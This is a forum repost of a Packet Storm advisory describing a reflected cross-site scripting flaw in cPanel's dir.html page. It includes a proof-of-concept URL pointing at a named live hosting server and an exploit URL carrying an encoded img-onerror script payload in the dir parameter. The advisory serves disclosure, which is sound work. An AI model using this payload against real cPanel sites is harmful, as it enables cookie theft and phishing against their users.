Jump to content
Praetorian503

C-Panel dir.html Cross Site Scripting

Recommended Posts

C-Panel suffers from a reflective cross site scripting vulnerability in dir.html.

Details
=============
Product: Cpanel
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: http://www.cpanel.net
Advisory-Status: NotPublished

Credits
=============
Discovered by: Rafay Baloch of RafayHackingArticles(RHA)

Affected Products:
=============
Cpanel's Latest Version

Description
=============
"Simple website management."

More Details
=============
I have discsovered a non persistent Cross site scripting (XSS) inside
Cpanel,
the vulnerability can be easily exploited and can be used to steal cookies,
perform
phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
=============
Log into your CPanel accoutn and navigate to the following link:


https://gator1347.hostgator.com:2083/frontend/x3/files/dir.html?showhidden=1&dir=

Now insert your xss payload inside Dir parameter.

Exploit
=============

https://localhost/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E


Solution
=============
Edit the source code to ensure that input is properly sanitized.

Source: Packet Storm

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...